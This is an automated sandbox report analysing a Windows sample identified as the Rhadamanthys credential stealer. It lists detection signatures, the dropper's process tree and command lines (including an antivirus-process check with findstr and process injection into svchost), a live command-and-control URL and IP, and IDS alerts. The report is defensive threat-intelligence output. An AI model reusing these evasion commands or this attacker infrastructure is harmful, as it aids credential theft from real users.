Windows Analysis Report
HI6VIJERUn.exe

Overview

General Information

Sample name: HI6VIJERUn.exe (renamed because original name is a hash value)
Original sample name: 7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f.exe
Analysis ID: 1577525
MD5: 3da674c87aa02f410b79109a2e5b1448
SHA1: a108a3d031e70a8bc706c376115ee9f3aac91508
SHA256: 7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f
Tags: 92-255-85-148, exe, user-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapter information
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • HI6VIJERUn.exe (PID: 3592 cmdline: "C:\Users\user\Desktop\HI6VIJERUn.exe" MD5: 3DA674C87AA02F410B79109A2E5B1448)
    • cmd.exe (PID: 1248 cmdline: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3436 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4612 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6928 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4912 cmdline: cmd /c md 407310 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5912 cmdline: cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hop.com (PID: 5924 cmdline: Hop.com B MD5: C63860691927D62432750013B5A20F5F)
        • Hop.com (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\407310\Hop.com MD5: C63860691927D62432750013B5A20F5F)
        • Hop.com (PID: 4120 cmdline: C:\Users\user\AppData\Local\Temp\407310\Hop.com MD5: C63860691927D62432750013B5A20F5F)
          • svchost.exe (PID: 4188 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 4828 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
              • chrome.exe (PID: 2204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
            • msedge.exe (PID: 7368 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 7676 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • wmplayer.exe (PID: 1948 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
              • dllhost.exe (PID: 7228 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • WerFault.exe (PID: 4380 cmdline: C:\Windows\system32\WerFault.exe -u -p 4120 -s 340 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • choice.exe (PID: 4672 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7228 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt"}
Source | Rule | Description | Author | Strings
0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
15.3.svchost.exe.1c2785c0000.5.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
14.3.Hop.com.24368620000.4.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
14.3.Hop.com.24368900000.5.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
15.3.svchost.exe.1c2785c0000.5.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
15.3.svchost.exe.1c2782e0000.4.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Source: Network Connection, Author: bartblaze, Data: DestinationIp: 92.255.85.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7228, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49747
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HI6VIJERUn.exe", ParentImage: C:\Users\user\Desktop\HI6VIJERUn.exe, ParentProcessId: 3592, ParentProcessName: HI6VIJERUn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, ProcessId: 1248, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentImage: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentProcessId: 4120, ParentProcessName: Hop.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4188, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentImage: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentProcessId: 4120, ParentProcessName: Hop.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4188, ProcessName: svchost.exe

                      HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1248, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6928, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T14:55:36.913171+0100 | 2854824 | 2 | Potentially Bad Traffic | 92.255.85.148 | 3574 | 192.168.2.11 | 49727 | TCP
2024-12-18T14:55:49.204531+0100 | 2854824 | 2 | Potentially Bad Traffic | 92.255.85.148 | 3574 | 192.168.2.11 | 49746 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T14:54:43.088634+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49860 | TCP
2024-12-18T14:55:11.809447+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 3574 | 192.168.2.11 | 49708 | TCP
2024-12-18T14:55:36.913171+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 3574 | 192.168.2.11 | 49727 | TCP
2024-12-18T14:55:49.204531+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 3574 | 192.168.2.11 | 49746 | TCP
2024-12-18T14:55:59.787850+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49747 | TCP
2024-12-18T14:56:07.057109+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49751 | TCP
2024-12-18T14:56:14.345809+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49767 | TCP
2024-12-18T14:56:21.814636+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49784 | TCP
2024-12-18T14:56:29.099375+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49811 | TCP
2024-12-18T14:56:36.355906+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49827 | TCP
2024-12-18T14:56:43.603010+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 92.255.85.148 | 443 | 192.168.2.11 | 49844 | TCP

                      AV Detection

Source: 14.3.Hop.com.24366310000.6.unpack, Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt"}
Source: HI6VIJERUn.exe, ReversingLabs: Detection: 55%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.2% probability
Source: C:\Windows\System32\svchost.exe, Code function: 15_3_00007DF426AB60F0 CryptUnprotectData,15_3_00007DF426AB60F0
Source: HI6VIJERUn.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49747 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49751 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49784 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49811 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49827 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49844 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49860 version: TLS 1.2
Source: HI6VIJERUn.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: kernel32.pdbUGP source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdbUGP source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdb source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\HI6VIJERUn.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\HI6VIJERUn.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com, Code function: 12_2_00007FF68C472DE0 FindFirstFileExW,12_2_00007FF68C472DE0
Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com, Code function: 12_2_00007FF68C4ACE3C GetFileAttributesW,FindFirstFileW,FindClose,12_2_00007FF68C4ACE3C
Source: C:\Windows\System32\svchost.exe, Code function: 15_3_00007DF426AB0B80 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,15_3_00007DF426AB0B80
Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com, Code function: 14_2_00000243665E5BC8 GetLogicalDriveStringsW,QueryDosDeviceW,14_2_00000243665E5BC8
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\407310\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\407310
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\svchost.exe, Code function: 4x nop then dec esp, 15_3_00007DF426AC1741
Source: C:\Program Files\Windows Media Player\wmplayer.exe, Code function: 4x nop then dec esp, 35_2_0000021AB2FD5681

                      Networking

Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49708
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49727
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49746
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49751
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49747
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49827
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49784
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49767
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49844
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49811
Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49860
Source: Malware configuration extractor, URLs: https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt
Source: global traffic, TCP traffic: 92.255.85.148 ports 3574,3,443,4,5,7
Source: global traffic, TCP traffic: 192.168.2.11:49708 -> 92.255.85.148:3574
Source: Joe Sandbox View, IP Address: 94.245.104.56 94.245.104.56
Source: Joe Sandbox View, IP Address: 129.6.15.28 129.6.15.28
Source: Joe Sandbox View, JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: Network traffic, Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 92.255.85.148:3574 -> 192.168.2.11:49727
Source: Network traffic, Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 92.255.85.148:3574 -> 192.168.2.11:49746
Source: unknown, TCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: global traffic | HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 | Host: clients2.googleusercontent.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global traffic | DNS traffic detected: DNS query: msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiF
                      Source: global traffic | DNS traffic detected: DNS query: time.windows.com
                      Source: global traffic | DNS traffic detected: DNS query: time.cloudflare.com
                      Source: global traffic | DNS traffic detected: DNS query: gbg1.ntp.se
                      Source: global traffic | DNS traffic detected: DNS query: time.facebook.com
                      Source: global traffic | DNS traffic detected: DNS query: x.ns.gin.ntt.net
                      Source: global traffic | DNS traffic detected: DNS query: time-a-g.nist.gov
                      Source: global traffic | DNS traffic detected: DNS query: time.google.com
                      Source: global traffic | DNS traffic detected: DNS query: ntp.time.nl
                      Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: unknown | HTTP traffic detected: POST /dns-query HTTP/1.1 | Host: chrome.cloudflare-dns.com | Connection: keep-alive | Content-Length: 128 | Accept: application/dns-message | Accept-Language: * | User-Agent: Chrome | Accept-Encoding: identity | Content-Type: application/dns-message
                      Source: svchost.exe, 0000000F.00000003.1992811813.000001C278646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875682617.0000422C0014C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1874933510.0000422C0006C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877560803.0000422C00530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/
                      Source: wmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2694366363.00007DF4F821D000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2136103443.0000021AB31AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%u
                      Source: wmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2694366363.00007DF4F821D000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2136103443.0000021AB31AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%u...
